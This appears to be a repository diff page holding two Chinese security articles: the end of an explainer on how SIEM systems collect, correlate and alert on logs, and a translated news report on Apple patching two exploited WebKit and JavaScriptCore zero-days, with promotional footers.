在当今复杂的网络安全环境中,安全信息与事件管理系统(SIEM)成为了保护企业网络安全的重要工具。
|
||||
|
||||
SIEM 是一种强大的网络安全系统,它的主要作用是收集并集中来自各种网络设备和端点的数据。
|
||||
无论是服务器、工作站、笔记本电脑,还是防火墙等网络设备,以及来自云服务如 Azure 和 AWS 的日志,SIEM 都能将它们全面收集起来。
|
||||
|
||||
首先是日志收集和归一化阶段。
|
||||
SIEM 可以从不同的数据源以各种格式(如 Syslog、Windows 事件日志等)收集日志,然后将这些日志归一化为一致的格式,以便进行轻松高效的分析。
|
||||
|
||||
接着是日志解析和丰富化过程。
|
||||
SIEM 会对收集到的日志进行解析,提取关键的数据字段,例如 IP 地址、时间戳和事件类型等。
|
||||
这使得系统能够更好地理解和分析发生的各种活动。
|
||||
|
||||
然后是关联分析阶段。
|
||||
SIEM 会根据规则对不同的事件进行关联,比如检测到多个失败的登录尝试、恶意 IP 流量、不寻常的登录位置、规则违反以及过度的数据传输等情况,还能检测到威胁横向移动和特权提升尝试等潜在的安全风险。
|
||||
当触发关联规则时,SIEM 会生成一个潜在威胁的警报。
|
||||
这些警报会根据严重程度进行优先级排序,关键的警报会被优先处理,通常会使用自动化的预案进行快速分类。
|
||||
|
||||
一旦生成警报,SIEM 会将其发送给安全运营中心(SOC)团队。
|
||||
同时,SIEM 还可以采取自动化的响应和遏制措施,如封锁 IP、隔离设备或禁用账户等。
|
||||
|
||||
最后,SIEM 会生成详细的报告,用于合规性审查以及为未来的事件处理提供参考。
|
||||
通过持续的监测和改进,SIEM 不断提升对网络安全事件的响应能力和防范水平。
|
||||
|
||||
|
||||

|
||||
|
||||
|
||||
知识大陆:内部交流群:
|
||||
|
||||
|
||||

|
||||
|
||||
|
||||
|
||||
|
||||
关注东方隐侠安全团队 一起打造网安江湖
|
||||
|
||||
东方隐侠安全团队,一支专业的网络安全团队,将持续为您分享红蓝对抗、病毒研究、安全运营、应急响应等网络安全知识,提供一流网络安全服务,敬请关注!
|
||||
|
||||
|
||||

|
||||
|
||||
|
||||
|
||||
|
||||
公众号|东方隐侠安全团队
|
||||
|
||||
|
93
doc/苹果紧急修复已遭利用的两个0day.md
Normal file
93
doc/苹果紧急修复已遭利用的两个0day.md
Normal file
@ -0,0 +1,93 @@
|
||||
# 苹果紧急修复已遭利用的两个0day
|
||||
代码卫士 2024-11-20 09:30
|
||||
|
||||

|
||||
|
||||
|
||||
聚焦源代码安全,网罗国内外最新资讯!
|
||||
|
||||
作者**:****Lawrence Abrams**
|
||||
|
||||
**编译:代码卫士**
|
||||
|
||||
**苹果紧急修复了两个0day 漏洞,它们被用于针对基于 Intel 的 Mac 系统攻击活动中。**
|
||||
|
||||

|
||||
|
||||
|
||||
这两个0day漏洞位于 macOS Sequoia JavaScriptCore (CVE-2024-44308) 和 macOS 的 WebKit (CVE-2024-44309) 组件中。前一个漏洞可导致攻击者通过恶意构造的 web 内容实现远程代码执行后果,后一个漏洞跨站点脚本 (XSS) 攻击。
|
||||
|
||||
苹果表示已在 macOS Sequoia 15.1.1 版本中修复这两个漏洞。由于一些组件也用于苹果的其它操作系统中,因此该漏洞也在 Ios 17.7.2和 iPadOS 17.7.2、iOS 18.1.1和 iPadOS 18.1.1 和visionOS 2.1.1中修复。这两个漏洞由谷歌威胁分析团队成员 Clément Lecigne 和 Benoît Sevens 发现,不过苹果和谷歌均未提供更多关于漏洞如何遭利用的详情。
|
||||
|
||||
加上这两个漏洞,苹果自2024年开始已修复6个0day漏洞,这个情况相比2023年修复的20个0day而言要好得多。
|
||||
|
||||
|
||||
|
||||
代码卫士试用地址:
|
||||
https://codesafe.qianxin.com
|
||||
|
||||
开源卫士试用地址:https://oss.qianxin.com
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
**推荐阅读**
|
||||
|
||||
[苹果紧急修复已遭利用的两个新 iOS 0day漏洞](http://mp.weixin.qq.com/s?__biz=MzI2NTg4OTc5Nw==&mid=2247519003&idx=1&sn=87b2f80deede9f2cb8e1092e9732820f&chksm=ea94ba71dde333675f4150799bb36ccc5360912e77c0af8aef77e7426b9b0c244aabb76833e4&scene=21#wechat_redirect)
|
||||
|
||||
|
||||
[苹果修复2024年遭利用的第1个0day漏洞](http://mp.weixin.qq.com/s?__biz=MzI2NTg4OTc5Nw==&mid=2247518729&idx=1&sn=022dec20b1d19ed71466fd78c5c9b7c1&chksm=ea94bb63dde33275e80731ce7aa70dbb77566e3599abe9f927ae24a32dc66aff5a1acd09f3d5&scene=21#wechat_redirect)
|
||||
|
||||
|
||||
[苹果紧急修复两个 iOS 0day漏洞](http://mp.weixin.qq.com/s?__biz=MzI2NTg4OTc5Nw==&mid=2247518251&idx=1&sn=b501407684b48f59fb89d2d77570a27c&chksm=ea94b941dde3305715701eacd7c1a39f8de6430adaf0c7c820423a0694a1ffdbf0ff60504574&scene=21#wechat_redirect)
|
||||
|
||||
|
||||
[苹果紧急修复已遭利用的3个0day漏洞](http://mp.weixin.qq.com/s?__biz=MzI2NTg4OTc5Nw==&mid=2247517726&idx=1&sn=6812214f8fc21189da02ba2731b87720&chksm=ea94b774dde33e62737863151185ae158018de3e7f683d689e2a466982db356c57f6d7c1de92&scene=21#wechat_redirect)
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
**原文链接**
|
||||
|
||||
|
||||
https://www.bleepingcomputer.com/news/security/apple-fixes-two-zero-days-used-in-attacks-on-intel-based-macs/
|
||||
|
||||
|
||||
题图:
|
||||
Pixabay
|
||||
License
|
||||
|
||||
****
|
||||
**本文由奇安信编译,不代表奇安信观点。转载请注明“转自奇安信代码卫士 https://codesafe.qianxin.com”。**
|
||||
|
||||
|
||||
|
||||
|
||||

|
||||
|
||||

|
||||
|
||||
**奇安信代码卫士 (codesafe)**
|
||||
|
||||
国内首个专注于软件开发安全的产品线。
|
||||
|
||||

|
||||
|
||||
|
||||
觉得不错,就点个 “
|
||||
在看
|
||||
” 或 "
|
||||
赞
|
||||
” 吧~
|
||||
|
Loading…
x
Reference in New Issue
Block a user